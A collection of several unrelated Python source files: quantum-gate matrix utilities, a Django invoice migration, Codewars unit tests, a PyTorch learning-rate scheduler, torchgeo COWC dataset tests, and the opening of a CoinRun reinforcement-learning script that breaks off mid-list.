[0, 0, 1, 0],
[0, 0, 0, cmath.exp((2 * cmath.pi * 1j) / 2 ** arg)]]),
}.get(operator, 'Invalid generator: There should be no argument for generator: ' + operator)
return {
'X': np.array([[0, 1],
[1, 0]]),
'Y': np.array([[0, -1j],
[1j, 0]]),
'Z': np.array([[1, 0],
[0, -1]]),
'H': (1/2**0.5) * np.array([[1, 1],
[1, -1]]),
'I': np.array([[1, 0],
[0, 1]]),
'S': np.array([[1, 0],
[0, 1j]]),
'Sdag': np.array([[1, 0],
[0, -1j]]),
'T': np.array([[1, 0],
[0, cmath.exp((1j * cmath.pi) / 4)]]),
'Tdag': np.array([[1, 0],
[0, cmath.exp((-1j * cmath.pi) / 4)]]),
'CNOT': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 1],
[0, 0, 1, 0]]),
'CX': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 1],
[0, 0, 1, 0]]),
'CY': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, -1j],
[0, 0, 1j, 0]]),
'CZ': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, -1]]),
'SWAP': np.array([[1, 0, 0, 0],
[0, 0, 1, 0],
[0, 1, 0, 0],
[0, 0, 0, 1]]),
'Toffoli': np.array([[1, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0]])
}.get(operator, 'Invalid generator: The given generator does not exist: ' + operator)
def matrix_to_operator(matrix, arg=None):
eye = np.identity(matrix.shape[0])
#if np.isclose(matrix, eye).all():
# return 'I'
operator = {
'X': np.array([[0, 1],
[1, 0]]),
'Y': np.array([[0, -1j],
[1j, 0]]),
'Z': np.array([[1, 0],
[0, -1]]),
'H': (1/2**0.5) * np.array([[1, 1],
[1, -1]]),
'S': np.array([[1, 0],
[0, 1j]]),
'Sdag': np.array([[1, 0],
[0, -1j]]),
'T': np.array([[1, 0],
[0, cmath.exp((1j * cmath.pi) / 4)]]),
'Tdag': np.array([[1, 0],
[0, cmath.exp((-1j * cmath.pi) / 4)]]),
'CNOT': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 1],
[0, 0, 1, 0]]),
'CX': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 1],
[0, 0, 1, 0]]),
'CY': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, -1j],
[0, 0, 1j, 0]]),
'CZ': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, -1]]),
'SWAP': np.array([[1, 0, 0, 0],
[0, 0, 1, 0],
[0, 1, 0, 0],
[0, 0, 0, 1]]),
'Toffoli': np.array([[1, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0]])
}
for key, value in operator.items():
if matrix.shape == value.shape:
if np.isclose(matrix, value).all():
print('Rounded')
return key
if arg is not None:
arg = float(arg)
operators = {
'Rx': np.array([[cmath.cos(arg / 2), -1j * cmath.sin(arg / 2)],
[1j * cmath.sin(arg / 2), cmath.cos(arg / 2)]]),
'Ry': np.array([[cmath.cos(arg / 2), -cmath.sin(arg / 2)],
[cmath.sin(arg / 2), cmath.cos(arg / 2)]]),
'Rz': np.array([[cmath.exp(-1j * arg / 2), 0],
[0, cmath.exp(1j * arg / 2)]]),
'CR': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, cmath.exp(arg * 1j)]]),
'CRk': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, cmath.exp((2 * cmath.pi * 1j) / 2 ** arg)]]),
}
for key, value in operators.items():
if np.isclose(matrix, value).all():
return key + ' ' + str(arg)
return 'Invalid generator: The given matrix does not require an argument or the matrix is invalid'
else:
# No argument is given so we try to find the R gate ourselves
if matrix.shape == (2, 2):
# R
if matrix[0][1] == 0 and matrix[1][0] == 0:
# Rz
return 'Rz ' + str(2 * -change_domain(cmath.phase(matrix[0,0]), new_domain=[0, 2*np.pi]))
elif isinstance(matrix[1, 0], complex):
# Rx
return 'Rx ' + str(2 * change_domain(cmath.acos(matrix[0,0]).real))
else:
# Ry
return 'Ry ' + str(2 * change_domain(cmath.acos(matrix[0,0]).real))
elif matrix.shape == (4, 4):
# Controlled R
if np.count_nonzero(matrix - np.diag(np.diagonal(matrix))) == 0:
# This checks if the matrix is diagonalized
if matrix[0][0] == matrix[1][1] == matrix[2][2] == 1:
# This checks whether the first 3 diagonal entries are 1
polar_coords = cmath.polar(matrix[3][3])
if np.isclose(polar_coords[0], 1):
# Check whether r_coord equals 1
phi = polar_coords[1]
if np.isclose(phi, 0):
return 'CR ' + str(phi)
k = cmath.log(-(2 * cmath.pi) / phi, 2).real
if isinstance(k, int) or k.is_integer():
return 'CRk ' + str(int(k))
return 'CR ' + str(phi)
return 'Invalid generator'
else:
return 'Invalid generator'
return 'Something went wrong'
def find_controlled_equivalent(operator, control_bits, qubit, nancillas, qubits):
if operator.startswith('C') or operator.startswith('SWAP'):
control_bits.append(nancillas)
controls_string = ', '.join(map(lambda c: f'q[{c}]', control_bits))
if ' ' in operator:
sep = operator.split(' ')
sep.append(',')
else:
sep = [operator, '', '']
result = {
'X': f'''CNOT {controls_string}, q[{qubit}]\n''',
'Y': f'''Sdag q[{qubit}]\nCNOT {controls_string}, q[{qubit}]\nS q[{qubit}]\n''',
'Z': f'''CZ {controls_string}, q[{qubit}]\n''',
'CX': f'''Toffoli {controls_string}, q[{qubit}]\n''',
'CY': f'''Sdag q[{qubit}]\nToffoli {controls_string}, q[{qubit}]\nS q[{qubit}]\n''',
'CZ': f'''H q[{qubit}]\nToffoli {controls_string}, q[{qubit}]\nH q[{qubit}]\n''',
'CNOT': f'''Toffoli {controls_string}, q[{qubit}]\n'''
}.get(operator, 'Invalid')
if result == 'Invalid':
if operator == 'Toffoli':
result = U_to_CU(qubits, control_bits[0], nancillas, sep[0] + f' q[{nancillas}], q[{nancillas + 1}], q[{qubit}]' + f'\n')
elif operator == 'SWAP':
result = U_to_CU(qubits, control_bits[0], nancillas, sep[0] + f' q[{qubit}], q[{nancillas}]' + f'\n')
else:
result = U_to_CU(qubits, control_bits[0], nancillas, sep[0] + f' q[{qubit}]' + sep[2] + sep[1] + f'\n')
if result == 'Invalid generator':
raise Exception('Operator not supported yet! Operator: ' + operator)
return result
|
<filename>polygon/invoice/migrations/0001_initial.py
# Generated by Django 3.0.6 on 2020-06-22 10:25
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
import django.utils.timezone
from django.conf import settings
from django.db import migrations, models
import polygon.core.utils.json_serializer
class Migration(migrations.Migration):
initial = True
dependencies = [
("order", "0085_delete_invoice"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Invoice",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"private_metadata",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
null=True,
),
),
(
"metadata",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
null=True,
),
),
(
"status",
models.CharField(
choices=[
("pending", "Pending"),
("success", "Success"),
("failed", "Failed"),
("deleted", "Deleted"),
],
default="pending",
max_length=50,
),
),
("created_at", models.DateTimeField(auto_now_add=True)),
("updated_at", models.DateTimeField(auto_now=True)),
("number", models.CharField(max_length=255, null=True)),
("created", models.DateTimeField(null=True)),
("external_url", models.URLField(max_length=2048, null=True)),
("invoice_file", models.FileField(upload_to="invoices")),
(
"order",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="invoices",
to="order.Order",
),
),
],
options={"abstract": False,}, # noqa: E231
),
migrations.CreateModel(
name="InvoiceEvent",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"date",
models.DateTimeField(
default=django.utils.timezone.now, editable=False
),
),
(
"type",
models.CharField(
choices=[
("requested", "The invoice was requested"),
(
"requested_deletion",
"The invoice was requested for deletion",
),
("created", "The invoice was created"),
("deleted", "The invoice was deleted"),
("sent", "The invoice has been sent"),
],
max_length=255,
),
),
(
"parameters",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
),
),
(
"invoice",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="events",
to="invoice.Invoice",
),
),
(
"order",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="invoice_events",
to="order.Order",
),
),
(
"user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
],
options={"ordering": ("date",),}, # noqa: E231
),
]
|
<reponame>aleattene/python-codewars-challenges
import unittest
from solution_pokemon_specials_contest import pk_special_winner
class PokemonSpecialsContest(unittest.TestCase):
def test_solution(self):
self.assertEqual(pk_special_winner(4, 14), 4)
self.assertEqual(pk_special_winner(71, 54), 71)
self.assertEqual(pk_special_winner(43, 44), -1)
self.assertEqual(pk_special_winner(83, 33), -1)
self.assertEqual(pk_special_winner(41, 45), 41)
self.assertEqual(pk_special_winner(5, 80), 80)
self.assertEqual(pk_special_winner(92, 51), 51)
self.assertEqual(pk_special_winner(27, 12), 12)
self.assertEqual(pk_special_winner(18, 72), -1)
self.assertEqual(pk_special_winner(17, 7), -1)
self.assertEqual(pk_special_winner(68, 6), 6)
self.assertEqual(pk_special_winner(60, 97), -1)
self.assertEqual(pk_special_winner(63, 74), -1)
self.assertEqual(pk_special_winner(81, 30), -1)
self.assertEqual(pk_special_winner(49, 37), 37)
self.assertEqual(pk_special_winner(24, 76), 76)
self.assertEqual(pk_special_winner(91, 82), 82)
self.assertEqual(pk_special_winner(34, 68), 34)
self.assertEqual(pk_special_winner(63, 51), -1)
self.assertEqual(pk_special_winner(90, 17), -1)
self.assertEqual(pk_special_winner(61, 65), -1)
self.assertEqual(pk_special_winner(31, 40), -1)
self.assertEqual(pk_special_winner(20, 3), -1)
self.assertEqual(pk_special_winner(58, 69), 58)
self.assertEqual(pk_special_winner(87, 65), -1)
self.assertEqual(pk_special_winner(92, 47), 92)
self.assertEqual(pk_special_winner(71, 66), 71)
self.assertEqual(pk_special_winner(9, 62), 62)
self.assertEqual(pk_special_winner(85, 17), -1)
self.assertEqual(pk_special_winner(1, 33), 33)
self.assertEqual(pk_special_winner(12, 13), 12)
self.assertEqual(pk_special_winner(52, 9), -1)
self.assertEqual(pk_special_winner(87, 14), -1)
self.assertEqual(pk_special_winner(33, 28), 28)
self.assertEqual(pk_special_winner(77, 52), -1)
self.assertEqual(pk_special_winner(19, 78), -1)
self.assertEqual(pk_special_winner(24, 89), -1)
self.assertEqual(pk_special_winner(72, 99), 72)
self.assertEqual(pk_special_winner(77, 18), -1)
self.assertEqual(pk_special_winner(25, 44), 44)
self.assertEqual(pk_special_winner(57, 51), -1)
self.assertEqual(pk_special_winner(60, 22), -1)
self.assertEqual(pk_special_winner(36, 65), -1)
self.assertEqual(pk_special_winner(98, 34), 98)
self.assertEqual(pk_special_winner(26, 12), 26)
self.assertEqual(pk_special_winner(51, 56), -1)
self.assertEqual(pk_special_winner(59, 94), -1)
self.assertEqual(pk_special_winner(70, 44), -1)
self.assertEqual(pk_special_winner(67, 13), 13)
self.assertEqual(pk_special_winner(31, 33), 31)
self.assertEqual(pk_special_winner(37, 85), -1)
self.assertEqual(pk_special_winner(3, 86), 3)
self.assertEqual(pk_special_winner(96, 71), 96)
self.assertEqual(pk_special_winner(93, 34), 34)
self.assertEqual(pk_special_winner(63, 99), -1)
self.assertEqual(pk_special_winner(69, 65), 65)
self.assertEqual(pk_special_winner(41, 8), -1)
self.assertEqual(pk_special_winner(13, 53), -1)
self.assertEqual(pk_special_winner(84, 35), -1)
self.assertEqual(pk_special_winner(73, 70), -1)
self.assertEqual(pk_special_winner(84, 70), 84)
self.assertEqual(pk_special_winner(72, 14), 72)
self.assertEqual(pk_special_winner(74, 22), 74)
self.assertEqual(pk_special_winner(61, 90), -1)
self.assertEqual(pk_special_winner(6, 46), 6)
self.assertEqual(pk_special_winner(58, 77), -1)
self.assertEqual(pk_special_winner(39, 46), -1)
self.assertEqual(pk_special_winner(79, 20), -1)
self.assertEqual(pk_special_winner(72, 68), 72)
self.assertEqual(pk_special_winner(80, 98), 80)
self.assertEqual(pk_special_winner(42, 97), 97)
self.assertEqual(pk_special_winner(26, 19), -1)
self.assertEqual(pk_special_winner(65, 35), -1)
self.assertEqual(pk_special_winner(12, 65), 12)
self.assertEqual(pk_special_winner(35, 49), -1)
self.assertEqual(pk_special_winner(58, 89), -1)
self.assertEqual(pk_special_winner(18, 67), 18)
self.assertEqual(pk_special_winner(75, 69), 69)
self.assertEqual(pk_special_winner(2, 4), 4)
self.assertEqual(pk_special_winner(83, 49), 83)
self.assertEqual(pk_special_winner(11, 57), -1)
self.assertEqual(pk_special_winner(56, 87), 56)
self.assertEqual(pk_special_winner(33, 17), -1)
self.assertEqual(pk_special_winner(79, 96), 79)
self.assertEqual(pk_special_winner(33, 4), -1)
self.assertEqual(pk_special_winner(80, 77), 80)
self.assertEqual(pk_special_winner(52, 57), 57)
self.assertEqual(pk_special_winner(68, 26), -1)
self.assertEqual(pk_special_winner(9, 38), 9)
self.assertEqual(pk_special_winner(99, 42), -1)
self.assertEqual(pk_special_winner(61, 86), -1)
self.assertEqual(pk_special_winner(51, 22), 22)
self.assertEqual(pk_special_winner(21, 77), -1)
self.assertEqual(pk_special_winner(32, 26), -1)
self.assertEqual(pk_special_winner(73, 47), 73)
self.assertEqual(pk_special_winner(29, 92), 92)
self.assertEqual(pk_special_winner(7, 37), 7)
self.assertEqual(pk_special_winner(12, 63), 12)
self.assertEqual(pk_special_winner(53, 88), -1)
self.assertEqual(pk_special_winner(34, 60), 60)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
"""
hp_schedule.py
Optimizer hyperparameter scheduler
!! Most of the schedulers could be reimplemented as compound schedules (prod or cat)
"""
from __future__ import print_function, division
import sys
import copy
import warnings
import numpy as np
from tqdm import tqdm
import torch
from torch import nn
from torch.nn import functional as F
from torch.autograd import Variable
# --
# Helpers
def power_sum(base, k):
return (base ** (k + 1) - 1) / (base - 1)
def inv_power_sum(x, base):
return np.log(x * (base - 1) + 1) / np.log(base) - 1
def linterp(x, start_x, end_x, start_y, end_y):
return start_y + (x - start_x) / (end_x - start_x) * (end_y - start_y)
def _set_hp(optimizer, hp_name, hp_hp):
num_param_groups = len(list(optimizer.param_groups))
if isinstance(hp_hp, float):
hp_hp = [hp_hp] * num_param_groups
else:
assert len(hp_hp) == num_param_groups, ("len(%s) != num_param_groups" % hp_name)
for i, param_group in enumerate(optimizer.param_groups):
param_group[hp_name] = hp_hp[i]
def maybe_warn_kwargs(kwargs):
if len(kwargs):
warnings.warn("\n\nHPSchedule: unused arguments:\n %s \n\n" % str(kwargs), RuntimeWarning)
# --
class HPSchedule(object):
@staticmethod
def set_hp(optimizer, hp):
for hp_name, hp_hp in hp.items():
_set_hp(optimizer, hp_name, hp_hp)
@staticmethod
def constant(hp_max=0.1, **kwargs):
maybe_warn_kwargs(kwargs)
def f(progress):
return hp_max
return f
@staticmethod
def step(hp_max=0.1, breaks=(150, 250), factors=(0.1, 0.1), epochs=None, repeat=True):
""" Step function learning rate annealing """
assert len(breaks) == len(factors)
breaks = np.array(breaks)
def f(progress):
if repeat:
progress = progress % epochs
return hp_max * np.prod(factors[:((progress >= breaks).sum())])
return f
@staticmethod
def linear(hp_max=0.1, epochs=None, repeat=True):
assert epochs is not None, "epochs is None"
def f(progress):
""" Linear learning rate annealing """
if repeat:
progress = progress % epochs
return hp_max * (epochs - progress) / epochs
return f
@staticmethod
def cyclical(hp_max=0.1, epochs=None, period_length=1, repeat=True):
assert epochs is not None, "epochs is None"
return HPSchedule.prod_schedule([
HPSchedule.stepify(HPSchedule.linear(epochs=epochs, hp_max=hp_max, repeat=repeat)),
HPSchedule.linear(epochs=period_length, hp_max=1, repeat=True),
])
@staticmethod
def linear_cycle(*args, **kwargs):
raise Exception('!! Renamed to one_cycle')
@staticmethod
def one_cycle(hp_add=0.095, epochs=10, hp_init=0.0, hp_final=0.005, extra=5):
def f(progress):
if progress < epochs / 2:
return 2 * (hp_final + hp_add) * (1 - (epochs - progress) / epochs)
elif progress <= epochs:
return hp_final + 2 * hp_add * (epochs - progress) / epochs
elif progress <= epochs + extra:
return hp_final * (extra - (progress - epochs)) / extra
else:
return hp_final / 10
return f
@staticmethod
def piecewise_linear(breaks, vals):
assert len(breaks) == len(vals)
def _f(progress):
if progress < breaks[0]:
return vals[0]
for i in range(1, len(breaks)):
if progress < breaks[i]:
return linterp(progress, breaks[i - 1], breaks[i], vals[i - 1], vals[i])
return vals[-1]
def f(x):
if isinstance(x, list) or isinstance(x, np.ndarray):
return [_f(xx) for xx in x]
else:
return _f(x)
return f
@staticmethod
def sgdr(hp_max=0.1, period_length=50, hp_min=0, t_mult=1):
def f(progress):
""" SGDR learning rate annealing """
if t_mult > 1:
period_id = np.floor(inv_power_sum(progress / period_length, t_mult)) + 1
offsets = power_sum(t_mult, period_id - 1) * period_length
period_progress = (progress - offsets) / (t_mult ** period_id * period_length)
else:
period_progress = (progress % period_length) / period_length
return hp_min + 0.5 * (hp_max - hp_min) * (1 + np.cos(period_progress * np.pi))
return f
@staticmethod
def burnin_sgdr(hp_init=0.1, burnin_progress=0.15, burnin_factor=100):
sgdr = HPSchedule.sgdr(hp_init=hp_init, **kwargs)
def f(progress):
""" SGDR learning rate annealing, w/ constant burnin period """
if progress < burnin_progress:
return hp_init / burnin_factor
else:
return sgdr(progress)
return f
@staticmethod
def exponential_increase(hp_init=0.1, hp_max=10, num_steps=100):
mult = (hp_max / hp_init) ** (1 / num_steps)
def f(progress):
return hp_init * mult ** progress
return f
# --
# Compound schedules
@staticmethod
def stepify(fn):
def f(progress):
progress = np.floor(progress)
return fn(progress)
return f
@staticmethod
def prod_schedule(fns):
def f(progress):
return np.prod([fn(progress) for fn in fns], axis=0)
return f
@staticmethod
def cat_schedule(fns, breaks):
# !! Won't work w/ np.arrays
assert len(fns) - 1 == len(breaks)
def f(progress):
assert (isinstance(progress, float) or isinstance(progress, int))
if progress < breaks[0]:
return fns[0](progress)
for i in range(1, len(breaks)):
if progress < breaks[i]:
return fns[i - 1](progress)
return fns[-1](progress)
return f
# --
# HP Finder
class HPFind(object):
@staticmethod
def find(model, dataloaders, hp_init=1e-5, hp_max=10, hp_mults=None,
params=None, mode='train', smooth_loss=False):
assert mode in dataloaders, '%s not in loader' % mode
# --
# Setup HP schedule
if model.verbose:
print('HPFind.find: copying model', file=sys.stderr)
model = model.deepcopy()
_ = model.train()
if hp_mults is not None:
hp_init *= hp_mults
hp_max *= hp_mults # Correct?
hp_scheduler = HPSchedule.exponential_increase(
hp_init=hp_init, hp_max=hp_max, num_steps=len(dataloaders[mode])
)
if params is None:
params = filter(lambda x: x.requires_grad, model.parameters())
model.init_optimizer(
opt=torch.optim.SGD,
params=params,
hp_scheduler={
"lr": hp_scheduler
},
momentum=0.9,
)
# --
# Run epoch of training w/ increasing learning rate
avg_mom = 0.98 # For smooth_loss
avg_loss = 0. # For smooth_loss
hp_hist, loss_hist = [], []
gen = enumerate(dataloaders[mode])
if model.verbose:
gen = tqdm(gen, total=len(dataloaders[mode]), desc='HPFind.find:')
for batch_idx, (data, target) in gen:
model.set_progress(batch_idx)
loss, _ = model.train_batch(data, target)
if smooth_loss:
avg_loss = avg_loss * avg_mom + loss * (1 - avg_mom)
debias_loss = avg_loss / (1 - avg_mom ** (batch_idx + 1))
loss_hist.append(debias_loss)
else:
loss_hist.append(loss)
if model.verbose:
gen.set_postfix(**{
"loss": loss,
})
hp_hist.append(model.hp['lr'])
if loss > np.min(loss_hist) * 4:
break
return np.vstack(hp_hist[:-1]), loss_hist[:-1]
@staticmethod
def get_optimal_hp(hp_hist, loss_hist, c=10, burnin=5):
"""
For now, gets smallest loss and goes back an order of magnitude
Maybe it'd be better to use the point w/ max slope? Or not use smoothed estimate?
"""
hp_hist, loss_hist = hp_hist[burnin:], loss_hist[burnin:]
min_loss_idx = np.array(loss_hist).argmin()
min_loss_hp = hp_hist[min_loss_idx]
opt_hp = min_loss_hp / c
if len(opt_hp) == 1:
opt_hp = opt_hp[0]
return opt_hp
if __name__ == "__main__":
from rsub import *
from matplotlib import pyplot as plt
# Step
# hp = HPSchedule.step(hp_max=np.array([1, 2]), factors=(0.5, 0.5), breaks=(10, 20), epochs=30)
# hps = np.vstack([hp(i) for i in np.arange(0, 30, 0.01)])
# _ = plt.plot(hps[:,0])
# _ = plt.plot(hps[:,1])
# show_plot()
# Linear
# hp = HPSchedule.linear(epochs=30, hp_max=0.1)
# hps = np.vstack([hp(i) for i in np.arange(0, 30, 0.01)])
# _ = plt.plot(hps)
# show_plot()
# # Linear cycle
# hp = HPSchedule.one_cycle(epochs=30, hp_max=0.1, extra=10)
# hps = np.vstack([hp(i) for i in np.arange(0, 40, 0.01)])
# _ = plt.plot(hps)
# show_plot()
# Piecewise linear
# vals = [
# np.array([0.1, 0.5, 1.0]) * 0.0,
# np.array([0.1, 0.5, 1.0]) * 1.0,
# np.array([0.1, 0.5, 1.0]) * 0.5,
# ]
# hp = HPSchedule.piecewise_linear(breaks=[0, 0.5, 1], vals=vals)
# hps = np.vstack([hp(i) for i in np.arange(-1, 2, 0.01)])
# _ = plt.plot(hps[:,0])
# _ = plt.plot(hps[:,1])
# _ = plt.plot(hps[:,2])
# show_plot()
# Cyclical
# hp = HPSchedule.cyclical(epochs=30, hp_max=0.1)
# hps = np.vstack([hp(i) for i in np.arange(0, 40, 0.01)])
# _ = plt.plot(hps)
# show_plot()
# SGDR
# hp = HPSchedule.sgdr(period_length=10, t_mult=2, hp_max=np.array([1, 2]))
# hps = np.vstack([hp(i) for i in np.arange(0, 70, 0.01)])
# _ = plt.plot(hps[:,0])
# _ = plt.plot(hps[:,1])
# show_plot()
# # Product
# hp = HPSchedule.prod_schedule([
# HPSchedule.stepify(HPSchedule.linear(epochs=30, hp_max=0.1)),
# HPSchedule.linear(epochs=1, hp_max=1),
# ])
# hps = np.vstack([hp(i) for i in np.arange(0, 30, 0.01)])
# _ = plt.plot(hps)
# show_plot()
# exponential increase (for setting learning rates)
# hp = HPSchedule.exponential_increase(hp_init=np.array([1e-5, 1e-4]), hp_max=10, num_steps=100)
# hps = np.vstack([hp(i) for i in np.linspace(0, 100, 1000)])
# _ = plt.plot(hps[:,0])
# _ = plt.plot(hps[:,1])
# _ = plt.yscale('log')
# show_plot()
|
<filename>tests/datasets/test_cowc.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import os
import shutil
from pathlib import Path
from typing import Generator
import pytest
import torch
from _pytest.fixtures import SubRequest
from _pytest.monkeypatch import MonkeyPatch
from torch.utils.data import ConcatDataset
import torchgeo.datasets.utils
from torchgeo.datasets import COWCCounting, COWCDetection
from torchgeo.datasets.cowc import COWC
from torchgeo.transforms import Identity
def download_url(url: str, root: str, *args: str, **kwargs: str) -> None:
shutil.copy(url, root)
class TestCOWC:
def test_not_implemented(self) -> None:
with pytest.raises(TypeError, match="Can't instantiate abstract class"):
COWC() # type: ignore[abstract]
class TestCOWCCounting:
@pytest.fixture(params=["train", "test"])
def dataset(
self,
monkeypatch: Generator[MonkeyPatch, None, None],
tmp_path: Path,
request: SubRequest,
) -> COWC:
monkeypatch.setattr( # type: ignore[attr-defined]
torchgeo.datasets.utils, "download_url", download_url
)
base_url = os.path.join("tests", "data", "cowc_counting") + os.sep
monkeypatch.setattr( # type: ignore[attr-defined]
COWCCounting, "base_url", base_url
)
md5s = [
"fd44e49492d63e9050e80d2157813263",
"c44f6d709076562116b1a445ea91a228",
"405d33d745a850c3a0c5e84713c5fd26",
"3bd99854a243218fe40ea11dd552887f",
"5648852da4212876502c7a454e70ce8e",
"f91460b2e7dcfbad53f5f5ede05f2da2",
"9d26d6c4bca7c6e932b0a6340647af8b",
"ccc18c4ac29a13ad2bcb293ff6be69fe",
]
monkeypatch.setattr(COWCCounting, "md5s", md5s) # type: ignore[attr-defined]
root = str(tmp_path)
split = request.param
transforms = Identity()
return COWCCounting(root, split, transforms, download=True, checksum=True)
def test_getitem(self, dataset: COWC) -> None:
x = dataset[0]
assert isinstance(x, dict)
assert isinstance(x["image"], torch.Tensor)
assert isinstance(x["label"], torch.Tensor)
def test_len(self, dataset: COWC) -> None:
assert len(dataset) == 12
def test_add(self, dataset: COWC) -> None:
ds = dataset + dataset
assert isinstance(ds, ConcatDataset)
assert len(ds) == 24
def test_already_downloaded(self, dataset: COWC) -> None:
COWCCounting(root=dataset.root, download=True)
def test_out_of_bounds(self, dataset: COWC) -> None:
with pytest.raises(IndexError):
dataset[12]
def test_invalid_split(self) -> None:
with pytest.raises(AssertionError):
COWCCounting(split="foo")
def test_not_downloaded(self, tmp_path: Path) -> None:
with pytest.raises(RuntimeError, match="Dataset not found or corrupted."):
COWCCounting(str(tmp_path))
class TestCOWCDetection:
@pytest.fixture
def dataset(
self, monkeypatch: Generator[MonkeyPatch, None, None], tmp_path: Path
) -> COWC:
monkeypatch.setattr( # type: ignore[attr-defined]
torchgeo.datasets.utils, "download_url", download_url
)
base_url = os.path.join("tests", "data", "cowc_detection") + os.sep
monkeypatch.setattr( # type: ignore[attr-defined]
COWCDetection, "base_url", base_url
)
md5s = [
"dd8725ab4dd13cf0cc674213bb09e068",
"37619fce32dbca46d2fd96716cfb2d5e",
"405d33d745a850c3a0c5e84713c5fd26",
"3bd99854a243218fe40ea11dd552887f",
"5648852da4212876502c7a454e70ce8e",
"f91460b2e7dcfbad53f5f5ede05f2da2",
"9d26d6c4bca7c6e932b0a6340647af8b",
"ccc18c4ac29a13ad2bcb293ff6be69fe",
]
monkeypatch.setattr(COWCDetection, "md5s", md5s) # type: ignore[attr-defined]
root = str(tmp_path)
split = "train"
transforms = Identity()
return COWCDetection(root, split, transforms, download=True, checksum=True)
def test_getitem(self, dataset: COWC) -> None:
x = dataset[0]
assert isinstance(x, dict)
assert isinstance(x["image"], torch.Tensor)
assert isinstance(x["label"], torch.Tensor)
def test_len(self, dataset: COWC) -> None:
assert len(dataset) == 12
def test_add(self, dataset: COWC) -> None:
ds = dataset + dataset
assert isinstance(ds, ConcatDataset)
assert len(ds) == 24
def test_already_downloaded(self, dataset: COWC) -> None:
COWCDetection(root=dataset.root, download=True)
def test_out_of_bounds(self, dataset: COWC) -> None:
with pytest.raises(IndexError):
dataset[12]
def test_invalid_split(self) -> None:
with pytest.raises(AssertionError):
COWCDetection(split="foo")
def test_not_downloaded(self, tmp_path: Path) -> None:
with pytest.raises(RuntimeError, match="Dataset not found or corrupted."):
COWCDetection(str(tmp_path))
|
<reponame>cx1027/coinrun_twoobjects<gh_stars>0
"""
Train an agent using a PPO2 based on OpenAI Baselines.
"""
import time
from mpi4py import MPI
import random
from coinrun import setup_utils, make
import tensorflow as tf
from baselines.common import set_global_seeds
import coinrun.main_utils as utils
# from coinrun.import setup_utils, policies, wrappers, ppo2
from coinrun.config import Config
from MOXCS import moxcs
import csv
# from coinrun.Mask_RCNN.csci_e89_project import det
import numpy.random
import pandas as pd
# from sympy.combinatorics import graycode
# import xcs
import gym
import matplotlib.pyplot as plt
import numpy as np
from gym import wrappers
import pickle
import numpy.random
import MOXCS.XCSmountainGym
from MOXCS.moeadMethod import moeadMethod
# from sympy.combinatorics.graycode import GrayCode
# from getCondition import getCondition
"""
An implementation of an N-bit multiplexer problem for the X classifier system
"""
num_envs=1
#The number of bits to use for the address in the multiplexer, 3 bit in example
bits = 1
#The maximum reward
rho = 1000
env_seed = '1'
#paper experiment
# learning_problems = 260
# validation_problems = 30
# interval = 20
#debug
learning_problems = 501
validation_problems = 5
interval = 10
nenvs=1
# arg_strs = setup_utils.setup_and_load()
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# env = utils.make_general_env(nenvs, seed=5)
#parameters
"""
Returns a random state of the mountainCar
"""
# pos_space = np.linspace(-1.2, 0.6, 12) #12 11
# vel_space = np.linspace(-0.07, 0.07, 20) #20 19
# action_space = [0, 1, 2]
#列行
maze1= [
[1,1],
[2,1],
[3,1],
[4,1],
[1,2],
[2,2],
[3,2],
[4,2],
[1,3],
[2,3],
[3,3],
[4,3],
[5,3],
[6,3],
[7,3],
[8,3],
[12,3],
[11,3],
[10,3],
[1,4],
[2,4],
[3,4],
[4,4],
[5,4],
[6,4],
[7,4],
[8,4],
[9,4],
[16,4],
[15,4],
[14,4],
[13,4],
[12,4],
[11,4],
[10,4],
[1,5],
[2,5],
[3,5],
[4,5],
[5,5],
[6,5],
